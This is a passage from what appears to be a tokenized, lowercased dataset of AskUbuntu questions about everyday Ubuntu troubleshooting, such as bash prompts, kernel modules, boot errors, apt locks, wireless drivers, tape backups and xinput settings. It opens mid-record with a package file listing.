usr/share/locale/bg/lc_messages/boot-sav.mo usr/share/locale/bn/lc_messages/boot-sav.mo usr/share/locale/bs/lc_messages/boot-sav.mo usr/share/locale/ca/lc_messages/boot-sav.mo usr/share/locale/ckb/lc_messages/boot-sav.mo usr/share/locale/cs/lc_messages/boot-sav.mo usr/share/locale/da/lc_messages/boot-sav.mo usr/share/locale/de/lc_messages/boot-sav.mo usr/share/locale/el/lc_messages/boot-sav.mo usr/share/locale/en_au/lc_messages/boot-sav.mo usr/share/locale/en_ca/lc_messages/boot-sav.mo usr/share/locale/en_gb/lc_messages/boot-sav.mo usr/share/locale/eo/lc_messages/boot-sav.mo usr/share/locale/es/lc_messages/boot-sav.mo usr/share/locale/et/lc_messages/boot-sav.mo usr/share/locale/eu/lc_messages/boot-sav.mo usr/share/locale/fa/lc_messages/boot-sav.mo usr/share/locale/fi/lc_messages/boot-sav.mo usr/share/locale/nn/lc_messages/boot-sav.mo usr/share/locale/oc/lc_messages/boot-sav.mo usr/share/locale/pl/lc_messages/boot-sav.mo usr/share/locale/pt/lc_messages/boot-sav.mo usr/share/locale/pt_br/lc_messages/boot-sav.mo usr/share/locale/ro/lc_messages/boot-sav.mo usr/share/locale/ru/lc_messages/boot-sav.mo usr/share/locale/sk/lc_messages/boot-sav.mo usr/share/locale/sl/lc_messages/boot-sav.mo usr/share/locale/sq/lc_messages/boot-sav.mo usr/share/locale/sr/lc_messages/boot-sav.mo usr/share/locale/sv/lc_messages/boot-sav.mo usr/share/locale/sw/lc_messages/boot-sav.mo usr/share/locale/ta/lc_messages/boot-sav.mo usr/share/locale/te/lc_messages/boot-sav.mo usr/share/locale/th/lc_messages/boot-sav.mo usr/share/locale/tl/lc_messages/boot-sav.mo usr/share/locale/tr/lc_messages/boot-sav.mo usr/share/locale/ug/lc_messages/boot-sav.mo usr/share/locale/uk/lc_messages/boot-sav.mo usr/share/locale/ur/lc_messages/boot-sav.mo usr/share/locale/uz/lc_messages/boot-sav.mo usr/share/locale/vi/lc_messages/boot-sav.mo usr/share/locale/yi/lc_messages/boot-sav.mo usr/share/locale/zh_cn/lc_messages/boot-sav.mo usr/share/locale/zh_hk/lc_messages/boot-sav.mo usr/share/locale/zh_tw/lc_messages/boot-sav.mo usr/share/locale/fil/lc_messages/boot-sav.mo usr/share/locale/fr/lc_messages/boot-sav.mo usr/share/locale/ga/lc_messages/boot-sav.mo usr/share/locale/gl/lc_messages/boot-sav.mo usr/share/locale/gu/lc_messages/boot-sav.mo usr/share/locale/he/lc_messages/boot-sav.mo usr/share/locale/hi/lc_messages/boot-sav.mo usr/share/locale/hr/lc_messages/boot-sav.mo usr/share/locale/ht/lc_messages/boot-sav.mo usr/share/locale/hu/lc_messages/boot-sav.mo usr/share/locale/hy/lc_messages/boot-sav.mo usr/share/locale/id/lc_messages/boot-sav.mo usr/share/locale/is/lc_messages/boot-sav.mo usr/share/locale/it/lc_messages/boot-sav.mo usr/share/locale/ja/lc_messages/boot-sav.mo usr/share/locale/ka/lc_messages/boot-sav.mo usr/share/locale/kn/lc_messages/boot-sav.mo usr/share/locale/ko/lc_messages/boot-sav.mo usr/share/locale/lt/lc_messages/boot-sav.mo usr/share/locale/lv/lc_messages/boot-sav.mo usr/share/locale/mg/lc_messages/boot-sav.mo usr/share/locale/mk/lc_messages/boot-sav.mo usr/share/locale/ms/lc_messages/boot-sav.mo usr/share/locale/mt/lc_messages/boot-sav.mo usr/share/locale/nb/lc_messages/boot-sav.mo usr/share/locale/nl/lc_messages/boot-sav.mo usr/share/apport/package-hooks/source_boot-repair.py usr/share/apport/package-hooks/source_os-uninstaller.py usr/share/doc/boot-repair/changelog.gz usr/share/doc/boot-sav/changelog.gz usr/share/doc/clean-ubiquity/changelog.gz usr/share/doc/os-uninstaller/changelog.gz usr/share/applications/boot-repair.desktop usr/share/applications/os-uninstaller.desktop usr/share/boot-sav/gui-init.sh usr/share/boot-sav/gui-actions.sh usr/share/boot-sav/gui-tab-grub.sh usr/share/boot-sav/gui-dummy.sh usr/share/boot-sav/gui-actions-purge.sh usr/share/boot-sav/gui-translations.sh usr/share/boot-sav/bis.sh usr/share/boot-sav/gui-tab-other.sh usr/share/boot-sav/boot-repair-gui.sh usr/share/boot-sav/boot-sav.glade usr/share/boot-sav/gui-scan.sh usr/share/boot-sav/bs-init.sh usr/share/boot-sav/gui-actions-grub.sh usr/share/boot-sav/bs-common.sh usr/share/boot-sav/gui-tab-loca.sh usr/share/boot-sav/gui-tab-mbr.sh usr/share/boot-sav/packconfig.png usr/share/boot-sav/removegrub.png usr/share/boot-sav/boot-repair.png usr/share/boot-sav/boot-repair.sh usr/share/boot-sav/boot-repair-actions.sh usr/share/boot-sav/boot-repair-translations.sh usr/share/boot-sav/os-uninstaller.png usr/share/boot-sav/os-uninstaller.sh usr/share/boot-sav/os-uninstaller-actions.sh usr/share/boot-sav/os-uninstaller-gui.sh usr/share/boot-sav/os-uninstaller-translations.sh usr/share/boot-sav/gui-raid-lvm.sh usr/share/boot-sav/gui-tab-main.sh usr/share/boot-sav/gui-g2slaunch.sh usr/bin/cleanubiquityafter usr/bin/cleanubiquitybefore usr/bin/os-uninstaller usr/bin/boot-repair etc/apport/crashdb.conf.d/os-uninstaller-crashdb.conf etc/apport/crashdb.conf.d/boot-repair-crashdb.conf docs/cleanubiquityafter.8 docs/cleanubiquitybefore.8 docs/os-uninstaller.8 docs/boot-repair.8 usr/share/icons/hicolor/128x128/apps/ usr/share/locale/af/lc_messages/ usr/share/locale/ar/lc_messages/ usr/share/locale/ast/lc_messages/ usr/share/locale/az/lc_messages/ usr/share/locale/be/lc_messages/ usr/share/locale/bg/lc_messages/ usr/share/locale/bn/lc_messages/ usr/share/locale/bs/lc_messages/ usr/share/locale/ca/lc_messages/ usr/share/locale/ckb/lc_messages/ usr/share/locale/cs/lc_messages/ usr/share/locale/da/lc_messages/ usr/share/locale/de/lc_messages/ usr/share/locale/el/lc_messages/ usr/share/locale/en_au/lc_messages/ usr/share/locale/en_ca/lc_messages/ usr/share/locale/en_gb/lc_messages/ usr/share/locale/eo/lc_messages/ usr/share/locale/es/lc_messages/ usr/share/locale/et/lc_messages/ usr/share/locale/eu/lc_messages/ usr/share/locale/fa/lc_messages/ usr/share/locale/fi/lc_messages/ usr/share/locale/nn/lc_messages/ usr/share/locale/oc/lc_messages/ usr/share/locale/pl/lc_messages/ usr/share/locale/pt/lc_messages/ usr/share/locale/pt_br/lc_messages/ usr/share/locale/ro/lc_messages/ usr/share/locale/ru/lc_messages/ usr/share/locale/sk/lc_messages/ usr/share/locale/sl/lc_messages/ usr/share/locale/sq/lc_messages/ usr/share/locale/sr/lc_messages/ usr/share/locale/sv/lc_messages/ usr/share/locale/sw/lc_messages/ usr/share/locale/ta/lc_messages/ usr/share/locale/te/lc_messages/ usr/share/locale/th/lc_messages/ usr/share/locale/tl/lc_messages/ usr/share/locale/tr/lc_messages/ usr/share/locale/ug/lc_messages/ usr/share/locale/uk/lc_messages/ usr/share/locale/ur/lc_messages/ usr/share/locale/uz/lc_messages/ usr/share/locale/vi/lc_messages/ usr/share/locale/yi/lc_messages/ usr/share/locale/zh_cn/lc_messages/ usr/share/locale/zh_hk/lc_messages/ usr/share/locale/zh_tw/lc_messages/ usr/share/locale/fil/lc_messages/ usr/share/locale/fr/lc_messages/ usr/share/locale/ga/lc_messages/ usr/share/locale/gl/lc_messages/ usr/share/locale/gu/lc_messages/ usr/share/locale/he/lc_messages/ usr/share/locale/hi/lc_messages/ usr/share/locale/hr/lc_messages/ usr/share/locale/ht/lc_messages/ usr/share/locale/hu/lc_messages/ usr/share/locale/hy/lc_messages/ usr/share/locale/id/lc_messages/ usr/share/locale/is/lc_messages/ usr/share/locale/it/lc_messages/ usr/share/locale/ja/lc_messages/ usr/share/locale/ka/lc_messages/ usr/share/locale/kn/lc_messages/ usr/share/locale/ko/lc_messages/ usr/share/locale/lt/lc_messages/ usr/share/locale/lv/lc_messages/ usr/share/locale/mg/lc_messages/ usr/share/locale/mk/lc_messages/ usr/share/locale/ms/lc_messages/ usr/share/locale/mt/lc_messages/ usr/share/locale/nb/lc_messages/ usr/share/locale/nl/lc_messages/ usr/share/icons/hicolor/128x128/ usr/share/locale/af/ usr/share/locale/ar/ usr/share/locale/ast/ usr/share/locale/az/ usr/share/locale/be/ usr/share/locale/bg/ usr/share/locale/bn/ usr/share/locale/bs/ usr/share/locale/ca/ usr/share/locale/ckb/ usr/share/locale/cs/ usr/share/locale/da/ usr/share/locale/de/ usr/share/locale/el/ usr/share/locale/en_au/ usr/share/locale/en_ca/ usr/share/locale/en_gb/ usr/share/locale/eo/ usr/share/locale/es/ usr/share/locale/et/ usr/share/locale/eu/ usr/share/locale/fa/ usr/share/locale/fi/ usr/share/locale/nn/ usr/share/locale/oc/ usr/share/locale/pl/ usr/share/locale/pt/ usr/share/locale/pt_br/ usr/share/locale/ro/ usr/share/locale/ru/ usr/share/locale/sk/ usr/share/locale/sl/ usr/share/locale/sq/ usr/share/locale/sr/ usr/share/locale/sv/ usr/share/locale/sw/ usr/share/locale/ta/ usr/share/locale/te/ usr/share/locale/th/ usr/share/locale/tl/ usr/share/locale/tr/ usr/share/locale/ug/ usr/share/locale/uk/ usr/share/locale/ur/ usr/share/locale/uz/ usr/share/locale/vi/ usr/share/locale/yi/ usr/share/locale/zh_cn/ usr/share/locale/zh_hk/ usr/share/locale/zh_tw/ usr/share/locale/fil/ usr/share/locale/fr/ usr/share/locale/ga/ usr/share/locale/gl/ usr/share/locale/gu/ usr/share/locale/he/ usr/share/locale/hi/ usr/share/locale/hr/ usr/share/locale/ht/ usr/share/locale/hu/ usr/share/locale/hy/ usr/share/locale/id/ usr/share/locale/is/ usr/share/locale/it/ usr/share/locale/ja/ usr/share/locale/ka/ usr/share/locale/kn/ usr/share/locale/ko/ usr/share/locale/lt/ usr/share/locale/lv/ usr/share/locale/mg/ usr/share/locale/mk/ usr/share/locale/ms/ usr/share/locale/mt/ usr/share/locale/nb/ usr/share/locale/nl/ usr/share/icons/hicolor/ usr/share/apport/package-hooks/ usr/share/doc/boot-repair/ usr/share/doc/boot-sav/ usr/share/doc/clean-ubiquity/ usr/share/doc/os-uninstaller/ usr/share/locale/ usr/share/applications/ usr/share/icons/ usr/share/apport/ usr/share/boot-sav/ usr/share/doc/ usr/share/ usr/bin/ usr/ etc/apport/crashdb.conf.d/ etc/apport/ etc/ docs/ ubuntu @ ubuntu : ~ $ cd boot-repair_3.193.7.orig bash : cd : boot-repair_3.193.7.orig : no such file or directory ubuntu @ ubuntu : ~ $
305052	changing behavior of bash prompt when functioning as root	before you click away , this is n't the typical `` how do i make my bash prompt have color '' question . i 've already customized my bash prompt to look like this : [ user @ host ] -- -- [ $ ( pwd ) ] $ where everything in brackets is light blue , and everything else ( including $ ) is black by adding the following to my ~/.bashrc file # turn the prompt symbol red if the user is root if [ $ ( id -u ) -eq 0 ] ; then # you are root , make the prompt red ps1= '' [ \e [ 01 ; 34m\u @ \h\e [ 00m ] -- -- [ \e [ 01 ; 34m $ ( pwd ) \e [ 00m ] \n\e [ 01 ; 31m # \e [ 00m `` else ps1= '' [ \e [ 01 ; 34m\u @ \h\e [ 00m ] -- -- [ \e [ 01 ; 34m $ ( pwd ) \e [ 00m ] \n $ `` fi the goal is to make it such that the only thing that changes when i use 'sudo su ' is that the black $ changes into a red # . i 've looked in /etc/bash.bashrc and /etc/profile to see if there is just a line to comment out , but there is a bunch of stuff about debian_chroot that i do n't understand , and i do n't want to screw something up . how can i accomplish what i want ? p.s . this is what i want the prompt to look like as root [ user @ host ] -- -- [ $ ( pwd ) ] ( red ) # edit : mark this solved , appending the above code to ~/.bashrc while root accomplished my goal . also , in the above code , $ ( pwd ) only displays the home directory ( i guess because that is the working directory when the terminal is opened ) , and never updates . replacing $ ( pwd ) with \w fixes this , but displays the home directory as ~ , which i was trying to avoid .
305060	ca n't get kernel module `uinput` started	i 'm trying to get my bd remote to work with my ubuntu media server and xbmc . i 've followed the directions here : http : //forums.boxee.tv/showthread.php ? t=15200 i get everything installed , but uinput just never runs . lsmod | grep uinput shows nothing , sudo modprobe uinput does n't help . because of this , i assume , when i go to the bluetooth manager , i ca n't pair the remote and the dongle on my server . what am i missing ?
305062	why does ubuntu keep opening up a browser with a facebook login ?	i just updated from ubuntu 12.10 to 13.04 . it keeps doing this annoying thing where it interrupts whatever i 'm doing and opens up a browser tab with a facebook login . it seems like it happens about every 15 minutes . why is it doing this and how do i make it stop ? edit : thanks for the helpful comments to this question . at first , i thought that my issue was different from the linked question , but upon closer inspection , it is the same issue . it sure would be nicer if this issue did n't make my computer harass me to log in to facebook over and over . i guess i 'll just remove my online account from ubuntu .
305068	ubuntu 12.10 does n't boot from usb	so i want to switch from linux mint 15 to ubuntu 12.10 . i used unetbootin to create the usb . i have linux mint 15 , and am trying to get ubuntu to load from the usb . but when i restart my computer it says `` boot error . '' i have n't tested it on another computer yet . any ideas ? -edit : what i expected to happen was ubuntu would boot up instead of giving the `` boot error '' message . what i did was just formatting and formatting over and over again due to it saying the same thing ( boot error ) . i 'm using a kingston 4gb usb drive . i also tried a 16gb drive but i do n't know the name .
305069	software updater window not displaying , though open in 13.04	i have a very interesting problem that has just recently developed . i am routinely getting software updates and i can see the software updater window is available to be displayed on the task bar in unity , but when i click on it i can not get it to display . the only way that i can get the updates to install is to right click on the task bar icon and advise it to install updates . i can not bring the update window up to see what i am installing ... . : o ( hope i do n't break it ! ) ; ) i have been searching around the forums and have not seen an issue that quite compares - so now i ask my friends on the web . is there some way i can make this window display ? i feel it is likely a setting in a config file somewhere on the system that i can not identify . some interesting points to supply : amd 6 core processor 8 gig ram gigabyte board with onboard amd graphics 1 terabyte drive dual 1080p monitors no dual boot to windows . system was built and ubuntu 12.10 was originally installed , with a subsequent upgrade to 13.04 i recently tried to install the amd raedon drivers and broke it - so i reversed back and now run the stock driver ( not sure which one ) . i ca n't recall if my issue started before this amd issue , or if was going on before that - i think they may be related .
305075	do i have to install drivers after an installation ?	do i have to install drivers for all of my devices after i install ubuntu ? does ubuntu have generic drivers for most computer equipment ( video , audio , network adapters )
305078	windows 7 system partition	when installing windows 7 it creates a small system partition . does the ubuntu install create a partition like this ? do i need to alter this windows 7 partition ( size ) ?
305079	how do i get the right wireless modules to load at startup for a bcm4322 ?	i have been troubleshooting my hp elitebook with bcm4322 14e4:432b wireless card . i am using linux kernel 3.9 and i have almost found the solution . reading on the linux wireless site , i found that the b43 and wl drivers should work at least somewhat with the card . i was unable to get things working using kmod-wl , and so i moved on to working with b43 . i followed the guide here , and got it working using these lines of code : modprobe -r b43 bcma modprobe -r brcmsmac bcma modprobe -r wl modprobe b43 when i restart the computer , i have to do this again to get things working . i know i am supposed to blacklist the unwanted modules , but adding brcmsmac and wl to the blacklist.conf file does not seem to work . how can i get this to work permanently ?
305080	how do i use utorrent on ubuntu 12.04 ?	this is a pretty broad question . i have utorrent already downloaded and can access the web ui , but this is as far as i `` can get . '' nothing happens when i paste the torrent url into the ... search bar ? i do not know where to go from here . if someone could link me to a good video or a clear thread that would teach me how to start downloads and manage them , etc. , i 'd appreciate it .
305086	whats a good way to learn how to make apps ?	im fairly new to the ubuntu distro , i was just wondering how to make apps . i would really like to expand my knowledge in this area . any info will help , thank you !
305088	ca n't boot windows 7 after ubuntu installation	i 've tried to install ubuntu on a separate partition along with windows 7 , but , after that , windows 7 does n't boot due to a disk error problem . suggest solution such that both oss boot perfectly .
305091	when i try to install vim i am getting this error . pls suggest solutions	when i try to install vim i am getting this error : sandy @ sandy-rev-1-0 : ~ $ sudo apt-get update [ sudo ] password for sandy : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
305092	ctrl + alt + arrow key does n't switch workspaces	my ctrl+alt+arrow key fails to switch my workspace , but this is only true if numlock is on i press ctrl followed by the alt key i 'm using the left alt key i 'm logged in as me ( as opposed to a guest ) any help debugging this weird behavior would be greatly appreciated . it 's a pretty frustrating little bug that gets in my way at least 20 times a day , and it 's so strange that i would really just like to understand how it could be happening , although i would n't mind just fixing it with some kind of keybindings/unity/compiz reset . i just need some pointers on how to achieve this reset . thanks !
305094	unbootable system , and i have 200gb of important files on it that i ca n't read even from a live usb	i 'm not sure what the problem is , so bear with me ! i 've been using ubuntu 12.10 solely for a few months and getting along ok with it . i originally partitioned my 1tb hdd , with ubuntu on one side & debian on the other . i 'm in the process of a very important piece of work with thousands of pictures and hundreds of video clips . i was trying to get better gpu drivers in order to play a steam game ( tf2 ) just to learn how to do it , and erased some fglrx drivers ( or something ) . nothing really changed , and i did n't accomplish anything . upon rebooting , my sidebar & top bars would not appear , however , i found that i could still bring up terminal and desktop appearance/settings , but was unable to change the fact that i lost my side & top bars . so i found a thread on askubuntu that seemed to fit , copy & pasted some sudo apt-get 's and sudo apt-remove 's , and upon reboot i get a loop to `` loading operating system ... '' and back to bios . after that i booted live from a usb stick , and can only access about 18gb of stuff , the rest being `` unreadable '' . i 'm not sure if the hard drive has crashed , making those particular 180gb of media unreadable or what . so that 's why i need to recover a little over 200gb of media . i came across something called boot-repair and maybe that will help repair my original ubuntu install ? but from the live usb i can not access my wireless hotspot ( tethering from an android phone ) . any help would be much appreciated ! i need to finish this project by the end of june ... furiously bites nails *the thread i used to copy & paste sudo commands is here : ati : no launcher or top bar in 12.10
305107	i dont have a different pc	ok so i have cleared my pcs hard drive thinking i could easily create a bootable stick drive from my macbook pro . here is my problem . all the tutorials are mac creating bootable stick for mac or pc for pc . is there a way i can create a bootable stick drive on os x for a pc computer ?
305108	how do you disable alt as the hud key in 13.04	i see answers for older versions , but the same process does n't seem to work in 13.04 . i have tried system settings ... the compiz config manager and the new unity tweak tool . they all report that i have disabled the hud key but the hud keeps popping up with alt . i also tried setting it to a different key and alt continues to cause the hud to come up .
305110	scanner of samsung scx-4200 does not work on ubuntu 12.10	i have a samsung scx-4200 multifunction printer/scanner which works fine under windows 8 . the printer works fine under ubuntu 12.10 , but the scanner does n't work . `` sudo sane-find-scanner '' find nothing . while `` scanimage -l '' get : `` device `xerox_mfp : libusb:003:016 ' is a samsung orion multi-function peripheral '' . when use `` xsane '' , it says there is no scanner . how can i do ?
305111	how to check what local server is installed in my machine ?	how do i know if my machine ( ubuntu ) is using some local server ? like wampp , xampp or lampp ? and also how do i know my ubuntu version something like that ?
305114	how to backup ubuntu in a remote ubuntu system ?	i am having a ubuntu desktop . i need to backup the contents of my ubuntu system in another ubuntu system that is connected over a local area network . how can i schedule automatic backup to that remote location . is there any software to achieve backup in a remote computer ? . i have installed grsync but i not sure how to use is to store backup in a remote host . kindly explain me
305119	which installer will install ubuntu on an amd e450 apu with radeon 2 gb ram on samsung machine	i want to install ubuntu to install oracle database for learning purpose . i have samsung machine with amd e450 apu with radeon 2 gb ram .
305128	my laptop heat up quickly	i 'm newbie using ubuntu , i have pre-installed wind*ws 7 on my ultrabook acer s3 951 then i make it dualboot using ubuntu 12.04 but after using it for an hour my laptop heat up quickly is it a normal condition ? sorry for my english
305129	how to install haskell platform 2013.2.0.0 on ubuntu 13.04 ?	i want to use haskell platform 2013.2.0.0 on ubuntu 13.04 . because there is no binary package provided , i have to compile it manually . however , there is a problem . ubuntu repo provides ghc 7.6.2 , but the haskell pratform requires ghc 7.6.3 to compile it , which is newer . therefore , i also have to compile and install ghc 7.6.3 . i am currently using ghc 7.6.2 and afraid such manual installation would mess up my environment . my question is , what is the best and the safest way to install haskell platform 2013.2.0.0 ?
305130	where can i browse the package database using a web-browser	i 'm looking for the ubuntu equivalent of http : //debian.org/distrib/packages .
305132	how to extend keyboard settings to login screen ?	i need to use a 3rd level key while in the login screen . i have mapped it to left-alt in my account , but in the login screen settings seem to have been not applied . is there any way to apply an user 's keyboard settings to the login screen ?
305135	notebook do n't sleep	nb acer extensa 5635g , on ubuntu 12.10 all run correctly . if i close nb , then go to sleep mode automatically , but on ubuntu 13.04 does n't work . nb run after closing display .
305136	how to write multiple backups in one tape ?	i am using hp lto -4 tape and i want to make backup in tape drive without losing my old data of tape . tar -czf /dev/st0 /www /home when i run this command so every time my old data are removed and new backup is there . but i want to keep my old and new backup .
305138	why to explicitly mention filesystem type while mounting ?	i want to understand the filesystem concepts of linux . i tried my best to collect info from internet before posting here .but i really got confused when i read lot of sites on internet..what i understood is when an os ( linux flavor ) is installed first time a file system is configured automatically on the hard disk which is nothing but the root file system may be ext.now there will be an existing directory tree structure . whenver we are booting up , root partition of the hard disk is mounted automatically to the root file system . ( its there in /etc/fstab file ) . when ever we want to view files in a storage device like floppy , usb etc we have to attach the device say /dev/cdrom to the existing root filesystem tree.command is mount -t iso9660 /dev/cdrom /mnt/mycdrom i assume by default ext file system is there in the harddisk./mnt/mycdrom is a part of the file system tree in the hard disk . why iso9660 type ( standard file system for a cd ) is explicitly mentioned here ? also please suggest me if there any site which can give me a clear picture of entire linux filesystems , partitions , installation ?
305139	chrubuntu on external hard drive ( lsblk not found ) ?	i have a chromebook ( acer c7 16gb ssd + 2gb ram version ) . i want to get ubuntu up and running on it using chrubuntu . when looking at the instructions on the blog , it says to check what name my external hard drive is under by typing lsblk | grep disk . i just typed it in the terminal in chrome os & i just keep getting `` unknown command lsblk '' . anybody know how to get it to work ? please ? btw , i am a n00b and i could n't find anything online about this .
305140	installing ubuntu on netbook	i have a netbook , i already installed ubuntu12.04 but it has so many errors and problems . i think it will be better to instal une on it , i searched ubuntu.com but i could n't find une version for netbook to download . there are only regular versions for pc and etc . how can i download ubuntu for netbook ( une ) ? i read about it , they said after 12.04 desktop version is combined with netbook one , so any one can use it ! but it 's a lie ! it 's not working properly , should i instal 10.10 again ?
305141	administrative password not accepted	my password works when i log on , and it works when i 'm in terminal and i am accessing root . the problem is when i try to install a lexmark s405 printer driver in terminal i 'm asked for the `` administrative password '' and it will not accept it -- says it 's wrong . ( i double click the installer and choose `` run in terminal '' ) i even changed the password with the same results . i 've tried my user name as well with no luck .
305143	how can i access my ubuntu server remotely ?	i have turned an old pc into an htpc/fileserver and have formatted a couple drives and have made them accessible and am currently able to connect them by typing in smb : //10.0.x.xx and then it gives me the available drives on the network . however i am only able to do this if i am on the same connection as the server is there anyway to connect to it remotely ? and this is my wanting to portforward , i have dont that , on os x when you connect to a server it shows the icon on the desktop and i want to know how i can access those on the go . thank you
305148	ubuntu 13.10 updating headers	to use vmware player , it is asked me to update headers to 3.9.0-1-generic . i tried to update it by using ; sudo apt-get install build-essential linux-headers- $ ( uname -r ) but it is failed and it respond like ; reading package lists ... done building dependency tree reading state information ... done package linux-headers-3.9.0-1-generic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'linux-headers-3.9.0-1-generic ' has no installation candidate my ubuntu is upgraded from 12.10 to 13.10 and i doubt that there might be some buggies because of upgrading . because of this problem i ca n't use vmware player . thank you ! edited current ubuntu version is 13.10
305149	can i use ubuntu in a virtual machine ?	i am a novice , the computer illiterate . i heard that ubuntu is free , and would like to try it , but my video card seems not to be supported . i heard of virtual machines . can oracle virtual box run ubuntu ? if so , is there anything i should do ? if not , what would be a better solution ?
305150	activity sqlite conversion - ubuntu 12.04	how to split or convert .sqlite datastore in a .sql/.json schema format ? i am trying to use an analytic engine for the activity.sqlite datastore generated by zeitgeist .
305158	problem in upgrading from 12.04 to 12.10	while updating ubuntu from 12.04 to 12.10 , it is giving an error : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/m/mesa/libxatracker1_9.0.3-0ubuntu0.1_i386.deb connection failed [ ip : 91.189.91.13 80 ] please help . also , my machine is not getting completely shutdown while shutting the machine off .
305162	ca n't run program in netbeans 7.3	i recently installed ubuntu 12.04 and installed netbeans 7.3 on it ( not the ubuntu version , directly from the website ) . i 'm trying to run a basic c++ program that uses allegro 5 but , even though it compiles , it can not run . when the project is located on a different partition the error it gives is : /bin/sh : 1 : exec : pathtoproject/dist/debug/gnu-linux-x86/projectname : permission denied however , when i copy the project directly to my home folder it gives me the following error : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 154 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 13 current serial number in output stream : 13 here is the program if it helps : # include < allegro5/allegro.h > int main ( ) { al_init ( ) ; allegro_display *display = al_create_display ( 1000,1000 ) ; al_clear_to_color ( al_map_rgb ( 255,255,255 ) ) ; al_flip_display ( ) ; al_rest ( 2 ) ; }
305163	beginner 's manuals	up to now i have used microsoft windows . i am a beginner with unix generally and with ubuntu 12.04 particularly . i have got advices to try the system by a command 'firefox ' and then to install a developers tool by a command 'sudo apt-get install gcc ' . i have tried to write the command directly to the ubuntu desktop window ; a command line appeared , i have written the command 'firefox ' ( without apostrophe characters and pressed enter key ) , but it starts no action , though the firefox browser starts well from an icon left at the desktop window of the newly installed ubuntu . i see , that about 'sudo apt-get install gcc ' with ubuntu 12.04 problems do exist and are discussed at the http : //askubuntu.com . i have written the command 'sudo apt-get install gcc ' to the ubuntu desktop window , too ; the system requested my password and made an icon 'update manager ' . i have installed all 211 updates , but the 'firefox ' nor the other command does not work and the 'update manager ' icon disappeared . my canon mg5150 usb printer does not print as a 'generic printer ' from the installation . evidently i need first beginner 's manuals how to work with the ubuntu 12.04 ( pressing f1 does nothing ) and what are base commands of unix . and also how to work with the firefox browser ; i have guessed how to set a bookmark but i do not see how to call it . and also how to make ftp connections and how to transfer files to the windows xp and from it by a net or by an usb flash . please advise me which manuals , thanks , tomas peceny
305166	change from ubuntu 12.10 to 12.04	actually i was updating from ubuntu 12.04 to 12.10 suddenly my machine got switched off then when i restarted the machine i am facing the following problems : 1 . even after doing shutdown it is not getting completely off . 2 . i can not update anything with update manager it is showing `` check internet connection '' where i have a 15mbps broadband . 3. whenever i am trying to update using update manager it is telling me not all update are installed the when i am doing partial update it is showing a error message as follows : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/m/mesa/libxatracker1_9.0.3-0ubuntu0.1_i386.deb then when i am doing do-release-update it is showing no new releases . so i want to return back to ubuntu 12.04
305171	can not recover `` trashed '' files in 13.04 64 bit	i was working on external hard-disk and my computer stopped responding . i unplugged the cables of the usb harddisk and forced the system to power off . on restarting the system i discovered the directory i was working on was missing . it was in the trash folder . i tried to restore it but it `` could not determine original location of `` myfolder '' . how do i restore this item from trash ?
305173	xinput wheel emulation properties have no effect	on an ubuntu 13.04 machine , i have the following input devices : $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb laserstream ( tm ) mouse id=9 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ chicony hp basic usb keyboard id=8 [ slave keyboard ( 3 ) ] ↳ hp wmi hotkeys id=10 [ slave keyboard ( 3 ) ] the default configuration of the mouse is : $ xinput list-props 9 device 'logitech usb laserstream ( tm ) mouse ' : device enabled ( 143 ) : 1 coordinate transformation matrix ( 145 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 273 ) : 0 device accel constant deceleration ( 274 ) : 1.000000 device accel adaptive deceleration ( 275 ) : 1.000000 device accel velocity scaling ( 276 ) : 10.000000 device product id ( 262 ) : 1133 , 49272 device node ( 263 ) : `` /dev/input/event3 '' evdev axis inversion ( 277 ) : 0 , 0 evdev axes swap ( 279 ) : 0 axis labels ( 280 ) : `` rel x '' ( 153 ) , `` rel y '' ( 154 ) , `` rel horiz wheel '' ( 271 ) , `` rel vert wheel '' ( 272 ) button labels ( 281 ) : `` button left '' ( 146 ) , `` button middle '' ( 147 ) , `` button right '' ( 148 ) , `` button wheel up '' ( 149 ) , `` button wheel down '' ( 150 ) , `` button horiz wheel left '' ( 151 ) , `` button horiz wheel right '' ( 152 ) , `` button side '' ( 266 ) , `` button extra '' ( 267 ) , `` button forward '' ( 268 ) , `` button back '' ( 269 ) , `` button task '' ( 270 ) , `` button unknown '' ( 265 ) , `` button unknown '' ( 265 ) , `` button unknown '' ( 265 ) , `` button unknown '' ( 265 ) evdev middle button emulation ( 282 ) : 0 evdev middle button timeout ( 283 ) : 50 evdev third button emulation ( 284 ) : 0 evdev third button emulation timeout ( 285 ) : 1000 evdev third button emulation button ( 286 ) : 3 evdev third button emulation threshold ( 287 ) : 20 evdev wheel emulation ( 288 ) : 0 evdev wheel emulation axes ( 289 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 290 ) : 10 evdev wheel emulation timeout ( 291 ) : 200 evdev wheel emulation button ( 292 ) : 4 evdev drag lock buttons ( 293 ) : 0 i can use xinput set-prop 9 < num > < values > to set some of the properties , e.g . the evdev axis swap property . in this case , the changes apply immediately . however , if i enter the following command , the value changes in the xinput output , but the scrolling behavior of the mouse stays the same : xinput set-prop 9 289 0 0 5 4 the other wheel emulation properties have no effect , either . what am i doing wrong ?
